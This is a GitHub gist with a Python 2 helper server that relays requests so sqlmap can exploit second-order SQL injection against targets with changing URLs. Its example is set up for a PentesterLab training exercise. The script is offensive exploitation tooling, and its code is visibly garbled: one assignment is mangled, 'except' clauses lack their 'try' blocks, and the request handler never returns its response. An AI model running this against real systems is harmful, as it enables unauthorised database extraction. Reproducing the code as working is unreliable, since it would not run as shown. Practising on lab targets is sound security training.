Create a gist now

Instantly share code, notes, and snippets.

Helper example middleware server to enable sqlmap to use its second-order exploitation option with changing urls
#!/usr/bin/env python
import SimpleHTTPServer
import SocketServer
import sys
import urllib
import logging
from optparse import OptionParser
# Helper example middleware server to enable sqlmap to use its second-order exploitation option with changing urls
# modify as needed for your purposes
# To Use:
# Create your own implementation of the ResultsProvider class which returns the desired page with the nextResult method
# An example of how this can be done for a URL with incrementing value is shown in ResultsProviderImpl
# create an instance of the ThreadedTCPServer, and pass the resultsProvider and any desired parameters in like so
#httpd = ThreadedTCPServer(("", port), ServerHandler)
#httpd.resultsProvider = ResultsProviderImpl(url='http://server/base/path', counter=23)
# Then run sqlmap with the second order option pointing to this server, e.g.
# --second-order=
# When sqlmap queries this server for the second order result, this server will fetch the appropriate result
# from the remote server and then supply it back to sqlmap, also allowing you to modify the response if desired
class ResultsProvider(object):
'''Base class used to fetch data from server for second order injection using sqlmap'''
import requests
import socket
import time
def __init__(self, **kwargs):
'''Constructor with sensible requests defaults'''
self.session = self.requests.Session()
self.wait = kwargs.get('wait', 2.0)
self.session.verify = kwargs.get('verify', False)
self.session.timeout = kwargs.get('timeout', 5) = kwargs.get('stream', False)
self.session.proxies = kwargs.get('proxies', {})
self.session.headers = kwargs.get('headers', {})
self.session.allow_redirects = kwargs.get('allow_redirects', True)
self.session.cookies = self.requests.utils.cookiejar_from_dict(kwargs.get('cookies', {}))
self.url = kwargs.get('url', None)
def doRequest(self, url, params=None, **kwargs):
'''Makes web request with timeoout support using requests session'''
while 1:
response = self.session.get(url, params=params, **kwargs)
except (self.socket.error, self.requests.exceptions.RequestException):
logging.exception('Retrying request in %.2f seconds...', self.wait)
return response
def nextResult(self):
'''Redefine me to make the request and return the response.text'''
#return self.doRequest(url='http://site/whatever/' + str(calculated_value)).text
raise NotImplementedError
class ResultsProviderImpl(ResultsProvider):
'''Example implementation to exploit 2nd order injection in Pentesterlabs Web II SQL Injection'''
def __init__(self, **kwargs):
super(ResultsProviderImpl, self).__init__(**kwargs)
self.counter=kwargs.get('counter', 1)
def nextResult(self):
r = self.doRequest(url=self.url + str(self.counter))
return r.text
class ThreadedTCPServer(SocketServer.ThreadingTCPServer):
'''Simple Threaded TCP server'''
class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
'''Simple http server request handler'''
def do_GET(self):
if self.server.debug:
print '=' * 40 + '\n'
print self.headers
print '=' * 40 + '\n'
result = self.server.resultsProvider.nextResult()
if self.server.debug:
print '=' * 40 + '\n'
print result
print '=' * 40 + '\n'
if __name__ == '__main__':
parser = OptionParser(usage='%prog [options] <httpport>')
parser.add_option('-d', '--debug', dest='debug', action='store_true', help='show debugging messages')
opts, args = parser.parse_args()
if len(args) == 1:
port = int(args[0])
except ValueError:
port = 8000
# parameters for example
# base url where second order injection occurs
baseUrl = ''
# starting point to count upwards from in injected results
baseNo = 738
httpd = ThreadedTCPServer(("", port), ServerHandler)
httpd.debug = opts.debug or False
# add the custom resultsprovider implementation
httpd.resultsProvider = ResultsProviderImpl(url=baseUrl, counter=baseNo)
print "Serving at: http://%s:%s/" % ('', str(port))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment